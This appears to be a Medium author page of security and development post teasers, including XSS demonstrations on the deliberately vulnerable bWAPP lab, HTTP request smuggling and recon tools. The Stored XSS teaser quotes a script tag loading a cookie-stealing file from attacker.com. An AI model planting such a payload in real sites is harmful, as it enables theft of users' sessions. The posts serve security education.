Image for post
Image for post

What is HTTP Request Smuggling?

HTTP Request Smuggling is very critical and high severity vulnerability and was initially discovered by watchfire back in 2005 and later it got re-discovered by James Kettle — (albinowax) in August 2019 and presented his research at DEF CON 27 & Black-HAT USA. HRS vulnerability allows an attacker to smuggle an ambiguous HTTP-request as second request in one single HTTP-request to bypass the security controls of a website and gain access to unauthorized sensitive data and performs malicious activities. …


Image for post
Image for post

Why a portfolio site is essential for a Software developer?

A portfolio site is essential for every software developer to showcase projects and technical skills which demonstrates what you can do based upon your resume, your portfolio will be very much helpful on the job search because the employer can able to see your work and will be easier for them to evaluate your work for the suitable job, nowadays for every software developer is quite essential to maintain a web presence like official GitHub, Twitter account & website, so that you can reach out developer communities and build a…


Image for post
Image for post

Introduction

Forest Assassin is a 2D adventure platformer game with easy controls and fun gameplay, which helps every one to get started, this is a classic platformer game with wonderfully designed characters and world. To complete the game collect all the coins and the trophy try to collect all 100 gold coins to become the highest scorer in this adventurers platformer game, on your way you will face many obstacles and enemies and use your sword to fight with the enemy.

How to play the game on desktop browser?

To make it easier for the user I have also…


Image for post
Image for post

Coronavirus (COVID-19) — Full Stack Application

What is Coronavirus (COVID-19)?

Coronavirus (COVID-19) which is an infectious disease caused by respiratory illness and symptoms like flu, cough, fever, difficulty breathing, on December 31, 2019, the first case was recorded in Wuhan, China and later the virus got spread around the world and as of now, around 1 million+ confirmed cases are being recorded since then.

You can protect yourself from this virus by following basic precautions like washing your hand frequently, avoid touching your face, maintaining a distance of (1 meter or 3 feet) between people and most importantly if you are sick then immediately call for…


Image for post
Image for post

Information Gathering is the most important stage of every penetration testing so that you will have a better understanding about your target to exploit vulnerabilities and information like (IP addresses, Subdomain, Open ports and etc.) but to gather information you need proper reconnaissance tools and there are many recon tools which are available on Github but among them, I found Top 10 Recons tools which you can use to gather all of this information about your target.

This article is actually published at https://hackbotone.com/blog/10-recon-tools-for-bug-bounty

Important Note

Always remember before scanning your target you should have proper authorization otherwise you should…


Image for post
Image for post

Introduction

HackbotOne website produce contents from various domains such as Web Hacking, Bug Bounty, Application Development & GameDevelopment.

This article is actually published at https://hackbotone.com/blog/hackbotone-full-stack-application

Which type of content you can expect?

Application Development

I will publish contents from both webs & mobile platforms for example — (Android, Node.js, MongoDB, Go, Reactjs, React-Native and many more) which are related to application development I’ll try to cover those topics with step-by-step explanation and mostly in this section I’ll cover programming.

Game Development

Mostly you can expect contents from Unity3d game engine platform and I’ll try to make small video tutorial…


Image for post
Image for post

This is the demonstration of Stored Cross-Site Scripting attack in SQLiteManager & User-Agent header and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.

bWAPP Official Link:- http://www.itsecgames.com/

How to perform Stored Cross-Site-Scripting attack in SQLiteManager?


Image for post
Image for post

This is the demonstration of Stored Cross-Site-Scripting attack in Change Secret and Cookies and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.

bWAPP Official Link:- http://www.itsecgames.com/

How to perform a Stored Cross-Site-Scripting attack in Change Secret?


Image for post
Image for post

Introduction to Stored XSS

When an attacker browsing a web application and found a vulnerability which allows him to embed an HTML tag into the input box and the embedded tag become a permanent item of that page and then the browser will parse this code every time whenever the page will get loaded.

For example in a blogging website attacker found a vulnerability in the comment section and embed this comment.

Attacker’s Comment Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more

<script src=”http://attacker.com/stealcookie.js”>…


Image for post
Image for post

Cross-site-Scripting — Reflected (phpMyAdmin & PHP_SELF)

This is the demonstration of Cross-Site-Scripting attack in phpMyAdmin and PHP_SELF and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.

bWAPP Official Link:- http://www.itsecgames.com/

How to perform a Cross-Site Scripting attack in phpMyAdmin?

Anshuman Pattnaik

I am a developer and worked on various platforms and frameworks such as Android, Unity3d, Node.js, Go, React/Redux, VR/AR and also Blockchain & Web security.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store